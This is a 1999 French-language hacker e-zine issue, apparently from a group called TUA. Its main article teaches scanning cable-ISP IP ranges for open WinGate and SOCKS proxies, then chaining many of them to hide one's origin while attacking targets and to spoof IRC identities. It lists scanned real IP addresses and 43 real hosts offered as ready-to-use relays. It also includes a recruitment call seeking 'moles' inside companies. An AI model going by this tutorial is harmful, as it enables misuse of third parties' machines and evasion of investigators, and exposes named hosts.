         ---///> No mORe Mot A fUcKiN' BlooD SuCkEr WorMs <\\\---
========================================================================

Je vous avais dit que mes titres avaient rien  voir. Donc, comme son titre ne l'indique toujours pas, ce texte va vous apprendre  peu prs tout ce que je sais sur les WinGates. WinGate est un programme qui splitte les connexions, ainsi ceux qui ont le cble l'utilisent souvent comme a ils peuvent partager la connexion par le cble avec tous les ordinateurs de leur maison. Autrement dit, plusieurs ordinateurs peuvent se connecter sur le WinGate et ainsi se trimbaler sur les rseaux avec la mme identit. L o a devient intressant pour nous c'est lorsqu'on trouve un serveur quip de WinGate, sur lequel on va se connecter et naviguer  partir de l. Lorsqu'on va chercher  avoir des infos sur nous on trouvera celles du WinGate. Spoofing rulez !

Comment reconnatre un serveur quip de WinGate ? Connectez-vous  ce serveur par telnet sur le port 23 (telnet serveur.com 23 dans la commande excuter du menu dmarrer), si c'est un WinGate vous tomberez sur une invite ressemblant  a :

WinGate>

Comment trouver un tel serveur ? Eh bien il n'y a pas de critre bien particulier qui permette d'identifier un serveur avec ou sans WinGate, mais on peut effectuer des recherches plutt globales. Comme je vous l'ai dit ce sont souvent des personnes qui ont le cble qui sont quipes de WinGate, vous pouvez donc essayer de scanner les IP du style 24.1.x.x, c'est la range d'IP de la compagnie Cox Cable. Pour faire cela utilisez un dommain scanner, vous allez entrer par exemple 24.1.156.x et il va scanner tous les IP commenant par 24.1.156, puis il va vous dire lesquels rpondent. Si vous n'avez pas dj ce genre d'outils je vous conseille de le chercher (on le trouve assez facilement). J'ai commenc un peu le scan et voici les IP que j'ai trouvs qui rpondent sur le port 1080 : 

24.1.2.59
24.1.6.108
24.1.6.152
24.1.6.248
24.1.8.175 
24.1.9.37
24.1.9.68 !!! gateway
24.1.9.127
24.1.9.199
24.1.9.213
24.1.9.224
24.1.9.245
24.1.10.48
24.1.10.121
24.1.10.209
24.1.11.58
24.1.11.116
24.1.12.220
24.1.13.80
24.1.15.197
24.1.15.240
24.1.18.190
24.1.18.209 !!! surement un gateway
24.1.19.128 !!! idem
24.1.19.142
24.1.24.229
24.1.24.251
24.1.25.204

Je me suis arrt aux 24.1.25.x, mais je n'ai pas trouv de WinGates. Une fois que vous avez votre liste d'IPs vous les telnettez sur le port 23 et vous regardez l'invite. Vous voyez ici que j'ai trouv des GateWays, qui ont une invite ressemblant beaucoup  WinGate : 
GateWay>
Le fonctionnement a l'air semblable, et je pense qu'on peut donc les utiliser aussi pour spoofer, mais je ne confirme pas, faute d'informations. Si vous connaissez les GateWays mailez moi.

Vous remarquez que j'ai scann sur le port 1080, car ce port identifie les SOCKS Proxys, ce qui peut nous amener  tomber sur un WinGate. Donc en clair pour chercher des WinGates, vous pouvez essayer de trouver des IP de personnes ayant le cble, ou scanner des grandes ranges d'IP  la recherche du port 1080. Les IP que vous trouverez de cette manire seront gnralement statiques. Mais il se peut que vous tombiez sur un IP dynamique, c'est  dire qu'il ne marchera qu'une fois, ds que le possesseur du WinGate se reconnectera son IP aura chang. Au lieu de vous lamenter sur votre sort estimez vous heureux, les WinGates dynamiques sont encore plus efficace, je vous expliquerai plus loin pourquoi. Regardez plutt le format de cet IP dynamique, il est probable que l'ISP (Internet Service Provider) de cette personne reprenne le mme format pour ses usagers. Par exemple si l'IP dynamique est 212.23.158.169, alors scannez les IP du style 212.23.158.x. Vous trouverez normalement une liste d'IP, et vous avez de bonnes chances pour trouver des WinGates dans le tas. 

Note : les IP des WinGates ont gnralement un dernier chiffre lev, il y a donc plus de chances pour que 212.23.158.189 soit un WinGate que 212.23.158.2.




Maintenant vous savez en gros comment chercher des WinGates, maintenant que vous en avez vous voulez les utiliser pas vrai ? Comme leur nom l'indique, vous allez les utiliser tel un portail jusqu' votre destination finale. Ex : telnettez votre WinGate sur le port 23, et tapez ce qui suit  l'invite :
WinGate> serveur.com 23
Ainsi vous vous conecterez sur serveur.com sur le port 23, mais entre le serveur et vous il y aura le WinGate. Le serveur envoie les infos que vous demandez au WinGate, qui vous les transmet. Dans ses logs le serveur verra donc le WinGate comme user, avec son IP etc... et pas le vtre !

Maintenant vous voulez hacker le Pentagone... chouette, on se connecte sur notre WinGate favori, on se connecte sur le Pentagone, maintenant vous trouvez le flaw et vous changez le cours du dollar et envoyez des bombes atomiques sur les russes... le lendemain  3 heures du mat' les SWAT dbarquent dans votre chambre et tirant partout avec leurs MP-5 et en vous arrtant pour conspiration, et vous tes condamn  6658 ans de peine de prison (mais en secret ils vous librent et emprisonnent un claudo  votre place et aprs vous bossez pour eux et vous vous faites gav de tunes). En gros voici le schma, mais vous remarquez que quelque chose a cloch quelque part. Ben oui vous vous tes faits arrter, c'est pas ce qu'il y a de mieux tout de mme. Revoyons l'action au ralenti, lorsque les meilleurs spcialistes en informatique de la plante se sont mis  vous traquer : ils ont remarqu que vous vous tiez connect sur eux quelques secondes seulement aprs que ce se soit fait et ils ont dj commenc  vous tracer.... avant mme que vous ayez eu le temps de faire la plus petite commande ils savent que vous tes pass par un WinGate, avec son IP. Ils le contactent expressment sur le champ tout de suite et ils rquisitionnent ses logs, et l ils voient votre IP en clair parce que vous tes connect sur lui en ce moment mme. L ils contactent votre ISP, qui est bien oblig de leur dire qu'ils ont effectivement quelqu'un chez eux dont l'IP est 195.156.12.48, il leur balancent votre nom, adresse numro de phone... et voil comment se faire choper connement alors qu'on se croyait  l'abri...

Mais vous tes en train de vous dire "Ouin, je veux hacker le pentagone sans me faire choper moi !!!". Certes, et je suis l pour vous dire comment faire hhh... Je vous prsente maintenant la bounce technique... Comme vous tes trs fort vous avez toute une liste de WinGates prts  tre utiliss, et vous tes hypers chauds pour hacker le pentagone. C'est parti. Connectez vous sur un WinGate comme d'habitude :
WinGate> wingate2.net 23
Quoi ? on est sur un WinGate et on se connecte sur un autre  partir de l ???
WinGate> wingate3.com 23
Mais ??? 
WinGate> wingate4.com 23
....

Je crois que vous avez compris l c'est bon. La technique est de se connecter sur un WinGate, puis  partir de l sur un deuxime, et encore sur un autre, puis sur un autre, et ainsi de suite... Maintenant si on vous trace on trouvera l'IP du dernier WinGate. Puis si on arrive  vous tracer plus loin (je suis pas sr d'y arriver mais l je fais confiance au pentagone pour a ! :o) ), on trouvera l'IP du deuxime WinGate etc... Autrement dit si vous tes pass par 10 WinGates on mettra normment de temps  vous tracer, d'autant plus que certains ne loggent pas leur activit ou l'effacent au bout de deux ou trois jours... Si vous bouncez 10 WinGates vous tes le roi de la montagne, le fantme du net, samoura silencieux, le loup qui se faufile entre les mailles tisses par vos poursuivants.... De plus c'est pas moi qui le dit c'est les gars de Rhino9,  mon avis le plus grand groupe de hackers de tous les temps. Personnellement comme je suis de nature prudente et que j'aime pas que le SWAT dbarque chez moi comme a, je pense que je passerai plutt par au moins 20 WinGates, au moins l je pense que vous serez tranquille !!!! ;^)




Une autre utilit des WinGates est l'IRC Spoofing. Pour cela (technique pour windows) lancez votre client IRC (mIRC on va dire) et tapez les commandes suivantes :
/server wingate.com
Le client se connecte sur le WinGate.
/quote irc.irc.net 6667
Vous vous connectez sur le serveur spcifi, port 6667
/quote user nq nq nq@serveur.com nq
/quote nick nq
Ces deux dernires lignes envoient vos infos, ou nq signifie "n'importe quoi", c'est  dire que vous marquez ce que vous voulez je pense. Enfin l je m'avance pas trop j'aime pas IRC j'y vais pas. Si cela ne marche pas c'est probablement que le serveur IRC ne vous permet pas de passer par un WinGate, vous ne pourrez pas vous connecter sur le serveur. Pour ceux qui veulent une copie du script anti-WinGate mailez-moi. 




Maintenant en principe vous devriez tre un pro des WinGates. Mais comme je suis trs gentil, trs fort, trs intelligent, et... vous avez pas intrt  me contredire sinon je vous donne pas ce que j'avais prvu !!! Bon... je disais, pour viter de vous fatiguer voici une liste de WinGates prts  tre utiliss (43 si j'ai bien compt) :

proxy.amtvl.com:23   
156-21.dr.cgocable.ca:23  
bb1.betterbox.net:23  
computer.fairnet.com:23    
sun-170-233.sunwave.net:23   
ns.matsugc.co.jp:23  
195.96.97.236:23   
noyan-tapan.am:23
itpeople.ozemail.com.au:23
med23502-9.gw.connect.com.au:23
sjc.cyberspace.com.br:23
194.213.242.259:23
194.213.242.1:23
194.213.242.257:23
computer.fairnet.com:23
ria2.rheintal.ch:23
ewwmail.ozemail.com.au:23
mail.alghanim.qualitynet.net:23
syd-56K-041.tpgi.com.au:23
ns.elaso.cz:23
194.213.242.202:23
delirium.swm.uni-mannheim.de:23
uni.eltron.ee:23
mel-56K-147.tpgi.com.au:23
raqhope.ozemail.com.au:23
ewwmail.ozemail.com.au:23
mail.colosio-tabasco.org.mx:23
n1.cal.hamura.tokyo.jp:23
dns.rikcad.co.jp:23
hardwickgw.apex.net.au:23
cbp2.dircon.co.uk:23
ria2.rheintal.ch:23
204.39.96.1:23
mail.colosio-tabasco.org.mx:23
bb1.betterbox.net:23
n1.cal.hamura.tokyo.jp:23
delirium.swm.uni-mannheim.de:23
3dillusion.com:23
dns.rikcad.co.jp:23
adissmtp.ozemail.com.au:23
hardwickgw.apex.net.au:23
wflanin.czcom.cz:23
ewwmail.ozemail.com.au:23

Je viens tout juste d'updater la liste (12 aout 1999), donc profitez en tant qu'ils marchent tous. Le :23  la fin de chaque serveur signifie qu'il faut s'y connecter sur le port 23, au cas o vous auriez pas compris. Vous remarquerez qu'il y a deux IP se terminant par 1, ce qui contredit ce que j'ai dit tout  l'heure concernant les IP des WinGates, comme quoi il y a des exceptions. J'attire tout particulirement votre attention sur deux IP qui me semblent trs tranges : 194.213.242.259 et 194.213.242.257... vous avez remarqu ? Wut the hell is this ??? Thoriquement pour ceux qui ne le sauraient pas ce genre d'IPs est impossible, les numros allant de 0  255. Si quelqu'un  la moindre ide de ce que cela peut bien tre, qu'il me maile sur le champ !!!!

Bon ben maintenant je crois que j'ai plus qu' vous souhaiter un bon spoofing. Et si vous trouvez des WinGates qui ne marchent plus ou des nouveaux (qui marchent eux), toujours pareil, mailez moi qu'on aie une liste  jour. Depuis le temps que je vous dis de me mailer je crois que je devrais vous la donner mon adresse : maddany@multimania.com. 

---> bonne chance et allez pas vous faire choper, alors mfiance !


========================================================================
                          My name is OMM, X OOM !!!
========================================================================

Vous avez un compte chez Xoom ?
Super !!! Espace illimit etc...
Seulement, il y a un truc qui vous fais chier..., c'est la barre de pub
en haut de votre site...


H bien moi, le Grand Korben qui possde l'EGO le plus imposant de la plante
a trouv la solution...
C'est trs simple.

Au lieu de taper une adresse du type:

                             http://members.xoom.com/moncompte/

utilisez plutot cette adresse la:

                           http://members.xoom.com/_XOOM/moncompte/

En intercalant le /_XOOM/, pffuit !!! Plus de pub...
Merci qui ?
Merci Korben...


Korben00@Hotmail.com

[Nd MadDany : chtite nexplication, c'est parce que la vraie adresse o vos pages sont stockes est http://members.xoom.com/_XOOM/moncompte, et pas celle que l'on vous a donn. En tapant sans le _XOOM vous tes redirigs vers une version modifie automatiquement de vos pages, et videmment ils ont pas pris la peine de nous avertir chez xoom ! :o)]
[Nd WA: Ca me parait vident..!!]

=====================================================================
                   ON RECHERCHE POUR NOTRE GROUPE
=====================================================================

-Des hackers, plein de hackers sous Windows / Linux ou autre...
Vous serez les piliers du groupe. Dbutants ou expert, si vous aimez a, 
rejoignez-nous.

-Des graphistes pour le site.
Mes dessins sont un peu miteux les gars...

-Des programmeurs pour crer des logiciels qui nous faciliterons la tche.
C'est fatiguant de hacker " la main"

-Un hbergement gratos pour notre site avec accs ftp et http.
Ce serai sympa....

-Des "Chasseurs" pour trouver les sites sensibles
Alors, pour ceux qui n'ont pas peur, vous devrez vous ballader sur le web 
pour relever des adresses (pdophile, racistes, ...etc voir la liste.) que nous 
mettrons dans une Black list.

-Des taupes dans des entreprises pour des infos interressantes.
Pour tre au courant avant tout le monde et taper l ou a fait mal.

-Des traducteurs (Anglais/Russe/Allemand/Japonais/Chinois/Italien....)
Pour que nous puissions tre compris du mond entier.

-Des contacts dans la presse pour exprimer nos ides.
Car la presse et notre "amie" et sera notre voie.

-Des crivains pour crire des articles pour le Zine (Tutorials, histoires, 
chansons, penses philosophiques...)
On a besoin de vos talents...

-Des pros de la scurit pour nous aider  pas nous faire pincer.
Des gars qui pourront foutre des Firewalls partout sur le site et qui pourront 
nous expliquer comment dtourner tel ou tel systme.

-Des codeurs et programmeurs de Dmos pour nous faire un super spot de pub...
L, on est gentils...

-Un gars qui pourrait nous filer un BOT pour notre irc

Merci et surtout, n'hsitez pas  vous inscrire....


=====================================================================
                        Rejoignez nous !!!
=====================================================================
Remplissez ce questionnaire et envoyez le moi  
White_Angel_TUA@Hotmail.com

     IL FAUT ETRE MOTIVE ET ETRE TRES BON DANS SON DOMAINE !!!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nom: 

Prnom: 

Age: 

Sexe:

E-Mail:

Adresse site web:

Langue(s) parle(s):

Pays:

Surnom que vous voulez prendre au sein du groupe:

Ce que vous voulez faire dans le groupe:
-
-
-
-
-
-
Vos suggestions:
-
-
-
-
-
-
-
-
-

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Je vous attends nombreux...N'hsitez pas, nous acceptons tout le monde (Jeunes, 
vieux, homme , femme , dbutant , professionnel...MAIS MOTIVE ET QUI VEUT ALLER
LOIN !!!)
SAUF LES TETES BRULEES!!!!
[Nd MadDany : WA oublie toujours de prciser que c'est moi qui traite les inscriptions des femmes. C'est donc  moi qu'il faut envoyer votre inscription si vous disposez d'un hritage gntique fminin vident.]
[Nd WA: Non, n'coutez pas (ne lisez pas ?) ce qu'il dit, car JE gre toutes
les inscriptions mme celles des Demoiselles... ;-) ]
 
=====================================================================
                            REMERCIEMENTS
=====================================================================
Remerciements de White Angel :

-A MadDany, A Korben, A Moi aussi pour les articles du zines...
-Tous les hackers qui m'aident dans mon entreprise qui est je l'avoue ambitieuse.
-Vous qui me lisez et qui allez vous inscrire et distribuer nos zines.
-Et j'en oublie

Sinon, j'emmerde tjrs FT.

Remerciements de MadDany :

-A WA parce qu'il m'a remerci (c'est beau l'amiti...)
-A moi, parce que je m'aime [Nd WA: Nous aussi on t'aime..]
-A mon ordinateur parce qu'il m'aime aussi. Si c'est possible !

Remerciements de Korben :
-WA
-MAdDanY
-Mes amis (Merci Tchang !!)
-Jsus
-Mes ptes du channel #TUA
-Et  vous, amis lecteurs que j'aimes...


                                   REJOIGNEZ NOUS !!!

                         HTTP://WWW.UNDERGROUNDANGEL.CJB.NET


ATTENTION: Message pour les membres du groupe et pour ceux qui seraient susceptible
de nous rejoindre....
JE VAIS FAIRE UN GRAND TRI DANS LES MEMBRES...

Ca va se rsumer en 2 groupes:

Ceux qui sont motivs et qui se bougent--->On Garde
Et ceux qui ne foutent rien----> On vire !
[Nd MadDany : ou !]

Voil, j'espre que a vous a plus...A+

=====================================================================
                      A LA PROCHAINE !!!
=====================================================================

               ___________    ____
        ______/   \__//   \__/____\
      _/   \_/  :           //____\\
     /|      :  :  ..      /        \
    | |     ::     ::      \        /
    | |     :|     ||     \ \______/
    | |     ||     ||      |\  /  |
     \|     ||     ||      |   / | \
      |     ||     ||      |  / /_\ \
      | ___ || ___ ||      | /  /    \
       \_-_/  \_-_/ | ____ |/__/      \
                    _\_--_/    \      /
                   /____             /
                  /     \           /
                 \______\_________/

                 BOUGE TOI !!!!!!

                  That's all


HTTP://WWW.MULTIMANIA.COM/TUA/
HTTP://UNDERGROUNDANGEL.CJB.NET
Sur irc.kewl.org -----> #tua (on recherche un bot !!!)
White Angel: White_Angel_TUA@Hotmail.com

A+
White Angel
